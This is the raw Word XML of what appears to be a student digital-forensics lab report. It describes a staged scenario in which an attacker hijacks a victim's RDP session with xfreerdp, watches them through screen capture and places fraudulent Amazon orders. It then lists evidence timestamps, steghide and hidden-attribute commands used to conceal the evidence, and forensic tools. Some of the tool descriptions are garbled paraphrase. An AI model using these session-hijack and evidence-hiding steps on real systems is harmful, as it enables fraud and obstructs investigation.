        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BFE1F2" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step: 3 - RDP Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38000BC8" w14:textId="36FEC869" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hacker is able to watch the victim’s activities without interruption using screen capture. On such occasion, the victim logs into amazon account and makes orders using saved credit card.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F155DB" w14:textId="55514E47" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker takes the RDP session using xfreerdp client, changes the address to his home address and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>orders two iPhone 15 using the saved credit card.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1677631D" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; xfreerdp /v:192.168.100.5 /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u:admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="253D38CD" w14:textId="38B8D362" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evidence: C - RDP session Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084387B" w14:textId="2592384F" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evidence D - Victim Order Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75870324" w14:textId="5790711D" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD00F76" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step: 4 - Account Closure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAAA655" w14:textId="725EF147" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Victim receives the order confirmation of two iPhone 15 to his email address. Victim panics and reaches out to Amazon Customer Service, cancels the order, files a complaint using Victim’s details and proceeds with Account closure upon advice. Evidence E - Attacker Order Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC004A" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Location of Evidences with Timestamp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6408FF" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A - Phishing Email - Windows - documents folder - 23/11/2023 11:25PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA110E" w14:textId="47BE83C0" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B - Screen capture Screenshots - /root - 23/11/2023 11:44.50PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D0792" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C - Victim Order Confirmation - documents folder - 23/11/2023 11:45PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8862CD" w14:textId="3CC413A3" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D - RDP Session Verification - Reductant data - 23/11/2023 11:54:27PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64432890" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Event Logs - event </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4624</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B505B3F" w14:textId="7F781132" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E - Attacker Order Confirmation - documents folder - 23/11/2023 11:57PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C315EE" w14:textId="3F5B1CC4" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2551C3B3" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hidden files and Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E01AA1A" w14:textId="712D015F" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steganography and other hidden methods are used to hide the evidence in kali and windows. PGPEncryption is used to encrypt pdf files and located in documents folder with key in Zip folder steghide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E79392" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>embed -cf cover_image.jpg -ef hidden_image.jpg Passphrase: kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F14FFB5" w14:textId="35D6F74D" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attribute +h +r +s “RDP Wrap Library”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A2C163" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hard Drive Partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E1A58A" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disk Management is utilised to partition the hard disk. Each partition is executed to host Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C989047" w14:textId="77777777" w:rsidR="00E72A42" w:rsidRPr="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>client and Kali Linux images into it separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B5B4E" w14:textId="1F36E0B6" w:rsidR="00E72A42" w:rsidRDefault="00E72A42" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72A42">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Final Linux and Kali images are loaded into Hard drive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175778FE" w14:textId="5427DCEF" w:rsidR="009A3F51" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853A0EE" w14:textId="5B5197B6" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6436055F" w14:textId="0778E8B4" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4483F70A" w14:textId="15A91693" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D3B403" w14:textId="5EAD89D1" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428CEFA4" w14:textId="33D242D1" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED28912" w14:textId="00273A63" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF7AA0C" w14:textId="77777777" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368618B9" w14:textId="77777777" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2832"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776ECD01" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E6D56D" w14:textId="3E10D4EB" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00E72A42">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00171782">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PERSONAL RESERCH </w:t>
      </w:r>
      <w:r w:rsidR="00171782" w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REPORT WORK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F4936" w14:textId="77777777" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9BF4EC" w14:textId="2224DF10" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E1B16" w14:textId="59E40C79" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:r w:rsidR="00171782">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>personally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> when we are working on task then I research some topics from the internet about the tools what we used in this task, how can we make copy of hard disk and more so I write down as my personal report some things we used in team and some I write because of its importance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C181504" w14:textId="77777777" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB0043F" w14:textId="6B8F8617" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tools used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227A167C"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Forensic Imaging Tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTK Imager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BD5AFA"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Hashing Tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> md5deep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58110C"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File Analysis Tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Autopsy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92C63D"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Timeline Analysis Tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plaso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CBD392"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Malware Analysis Tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6DA039" w14:textId="77777777" w:rsidR="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAF4FDF" w14:textId="331388A3" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Utilized FTK Imager to make a scientific picture of the whole hard circle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397F7EE" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Confirmed the honesty of the picture utilizing MD5 checksums.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F17BD" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hash Examination</w:t>
      </w:r>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C1B30F" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Used md5deep to create hash values for all records in the gained picture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF350C" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cross-referred to the hash values against known information bases to distinguish noxious documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2C4BC" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Document Framework Investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF37535" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Utilized Dissection to investigate the record framework construction and concentrate applicable data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E47A53" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recognized as of late gotten to documents, erased records, and secret antiques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32359699" w14:textId="77777777" w:rsidR="00846B55" w:rsidRPr="00846B55" w:rsidRDefault="00846B55" w:rsidP="00846B55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00846B55">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
